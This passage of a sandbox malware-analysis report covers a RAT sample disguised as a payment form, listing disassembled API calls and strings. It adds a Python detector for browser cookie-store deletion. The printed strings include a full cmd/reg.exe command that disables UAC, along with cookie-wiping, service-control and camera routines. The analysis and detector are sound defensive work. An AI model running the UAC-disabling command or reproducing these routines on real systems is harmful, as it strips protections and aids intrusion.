                                              • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
                                              APIs
                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                                              • GetLastError.KERNEL32 ref: 0040AA28
                                              Strings
                                              • [Chrome Cookies not found], xrefs: 0040AA42
                                              • UserProfile, xrefs: 0040A9EE
                                              • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteErrorFileLast
                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                              • API String ID: 2018770650-304995407
                                              • Opcode ID: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                                              • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
                                              • Opcode Fuzzy Hash: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                                              • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
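The two cookie-clearing routines above (the Chrome one deleting `\AppData\Local\Google\Chrome\User Data\Default\Cookies` under `%UserProfile%`, the IE one resolving its path from the `Cookies` value under `User Shell Folders`) are easy to turn into an endpoint detection: a non-browser process deleting a browser cookie store. The following is an added example written for this page, not Joe Sandbox or Remcos code. It assumes Sysmon file-deletion events (Event ID 23 FileDelete, 26 FileDeleteDetected) exported as JSON with the standard `Image`, `User` and `TargetFilename` fields; the sample events, the process name `updater.exe`, the Edge/Firefox path patterns and the "browser deleting its own store is benign" exclusion are constructed assumptions, not data from the report.

```python
import json
import re
from pathlib import PureWindowsPath

# Cookie stores a RAT with this code path would target. The Chrome "Default\Cookies" path is
# the one the report shows being deleted; "Network\Cookies" is where current Chrome builds keep
# the same database. Edge and Firefox patterns are assumptions added for coverage of the
# "steal Firefox passwords or cookies" signature in the report summary.
COOKIE_STORES = [
    ("chrome",  re.compile(r"\\google\\chrome\\user data\\[^\\]+\\(network\\)?cookies$")),
    ("edge",    re.compile(r"\\microsoft\\edge\\user data\\[^\\]+\\(network\\)?cookies$")),
    ("firefox", re.compile(r"\\mozilla\\firefox\\profiles\\[^\\]+\\cookies\.sqlite$")),
    # The IE path in the report is resolved at run time from the "Cookies" value under
    # HKCU\...\Explorer\User Shell Folders; on current Windows that is INetCookies (assumption).
    ("ie",      re.compile(r"\\microsoft\\windows\\inetcookies\\")),
]

# Assumption: a browser deleting its own cookie store (profile reset, "clear browsing data")
# is expected noise; anything else deleting it is worth an alert.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
DELETE_EVENT_IDS = {23, 26}  # Sysmon FileDelete (archived) and FileDeleteDetected

# Constructed Sysmon-style events (not from the report): two deletions by an unknown
# binary, one by Chrome itself, one unrelated temp-file deletion.
SAMPLE_EVENTS = [
    {"EventID": 23, "Image": r"C:\Users\victim\AppData\Local\Temp\updater.exe", "User": "LAB\\victim",
     "TargetFilename": r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Cookies"},
    {"EventID": 26, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "User": "LAB\\victim",
     "TargetFilename": r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"EventID": 23, "Image": r"C:\Users\victim\AppData\Local\Temp\updater.exe", "User": "LAB\\victim",
     "TargetFilename": r"C:\Users\victim\AppData\Roaming\Mozilla\Firefox\Profiles\ab12cd34.default-release\cookies.sqlite"},
    {"EventID": 23, "Image": r"C:\Windows\System32\cleanmgr.exe", "User": "LAB\\victim",
     "TargetFilename": r"C:\Users\victim\AppData\Local\Temp\report.tmp"},
]
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)


def classify_target(path: str):
    """Return the browser whose cookie store `path` is, or None for any other file."""
    p = path.replace("/", "\\").lower()
    for browser, rx in COOKIE_STORES:
        if rx.search(p):
            return browser
    return None


def detect_cookie_store_deletion(events):
    """Return alert dicts for file-deletion events that hit a browser cookie store
    and were not performed by the browser itself."""
    alerts = []
    for ev in events:
        if int(ev.get("EventID", 0)) not in DELETE_EVENT_IDS:
            continue
        browser = classify_target(ev.get("TargetFilename", ""))
        if browser is None:
            continue
        image = ev.get("Image", "")
        if PureWindowsPath(image).name.lower() in BROWSER_IMAGES:
            continue
        alerts.append({"browser": browser, "image": image, "user": ev.get("User", ""),
                       "target": ev["TargetFilename"], "event_id": int(ev["EventID"])})
    return alerts


def detect_from_jsonl(text: str):
    """Same check over newline-delimited JSON, one Sysmon event per line."""
    return detect_cookie_store_deletion(json.loads(l) for l in text.splitlines() if l.strip())


if __name__ == "__main__":
    for a in detect_cookie_store_deletion(SAMPLE_EVENTS):
        print(f"[{a['browser']}] {a['image']} deleted {a['target']} (event {a['event_id']})")
```

The browser-image exclusion is keyed on the image file name only; a RAT that names its dropped binary `chrome.exe` would slip through, so in production pair it with the image's signer or full path rather than the bare name.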
                                              APIs
                                              • __allrem.LIBCMT ref: 00438A09
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                                              • __allrem.LIBCMT ref: 00438A3C
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                                              • __allrem.LIBCMT ref: 00438A71
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 1992179935-0
                                              • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                              • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
                                              • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                              • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __cftoe
                                              • String ID:
                                              • API String ID: 4189289331-0
                                              • Opcode ID: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                              • Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
                                              • Opcode Fuzzy Hash: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                              • Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __freea$__alloca_probe_16_free
                                              • String ID: a/p$am/pm
                                              • API String ID: 2936374016-3206640213
                                              • Opcode ID: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                                              • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
                                              • Opcode Fuzzy Hash: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                                              • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                                              • int.LIBCPMT ref: 0040F8D7
                                                • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                                • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                              • std::_Facet_Register.LIBCPMT ref: 0040F917
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                                              • __Init_thread_footer.LIBCMT ref: 0040F97F
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                              • String ID:
                                              • API String ID: 3815856325-0
                                              • Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                              • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
                                              • Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                              • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                              • String ID:
                                              • API String ID: 493672254-0
                                              • Opcode ID: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                                              • Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
                                              • Opcode Fuzzy Hash: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                                              • Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9
                                              APIs
                                              • GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                              • _free.LIBCMT ref: 0044575C
                                              • _free.LIBCMT ref: 00445784
                                              • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                              • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                              • _abort.LIBCMT ref: 004457A3
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$_free$_abort
                                              • String ID:
                                              • API String ID: 3160817290-0
                                              • Opcode ID: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                              • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
                                              • Opcode Fuzzy Hash: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                              • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                                              • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
                                              • Opcode Fuzzy Hash: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                                              • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                                              • Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
                                              • Opcode Fuzzy Hash: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                                              • Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                                              • Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
                                              • Opcode Fuzzy Hash: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                                              • Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                              • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                              • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleSizeSleep
                                              • String ID: h G
                                              • API String ID: 1958988193-3300504347
                                              • Opcode ID: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                                              • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
                                              • Opcode Fuzzy Hash: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                                              • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E
                                              APIs
                                              • RegisterClassExA.USER32(00000030), ref: 0041B310
                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                              • GetLastError.KERNEL32 ref: 0041B335
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ClassCreateErrorLastRegisterWindow
                                              • String ID: 0$MsgWindowClass
                                              • API String ID: 2877667751-2410386613
                                              • Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                              • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
                                              • Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                              • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
                                              APIs
                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                                                • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                                              • _UnwindNestedFrames.LIBCMT ref: 00437631
                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                                              • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                              • String ID: /zC
                                              • API String ID: 2633735394-4132788633
                                              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                              • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
                                              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                              • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
                                              APIs
                                              • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                                              • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                                              • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                                              • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MetricsSystem
                                              • String ID: ]tA
                                              • API String ID: 4116985748-3517819141
                                              • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                              • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
                                              • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                              • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
                                              APIs
                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                                              Strings
                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                                              • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle$CreateProcess
                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                              • API String ID: 2922976086-4183131282
                                              • Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                              • Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
                                              • Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                              • Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 0044085A
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 00440890
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                              • Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
                                              • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                              • Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00471E90,00404E5A,00000001,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405100
                                              • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 0040510C
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405117
                                              • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405120
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              Strings
                                              • Connection KeepAlive | Disabled, xrefs: 004050D9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                              • String ID: Connection KeepAlive | Disabled
                                              • API String ID: 2993684571-3818284553
                                              • Opcode ID: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                                              • Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
                                              • Opcode Fuzzy Hash: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                                              • Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
                                              APIs
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
                                              • PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
                                              • Sleep.KERNEL32(00002710), ref: 00418DBD
                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
                                              Similarity
                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                              • String ID: Alarm triggered
                                              APIs
                                              • Sleep.KERNEL32(00000000,?), ref: 004044A4
                                                • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                                              Similarity
                                              • API ID: H_prologSleep
                                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                              APIs
                                                • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                              • _free.LIBCMT ref: 00442318
                                              • _free.LIBCMT ref: 0044232F
                                              • _free.LIBCMT ref: 0044234E
                                              • _free.LIBCMT ref: 00442369
                                              • _free.LIBCMT ref: 00442380
                                              Similarity
                                              • API ID: _free$AllocateHeap
                                              APIs
                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                              • _free.LIBCMT ref: 004468EC
                                                • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
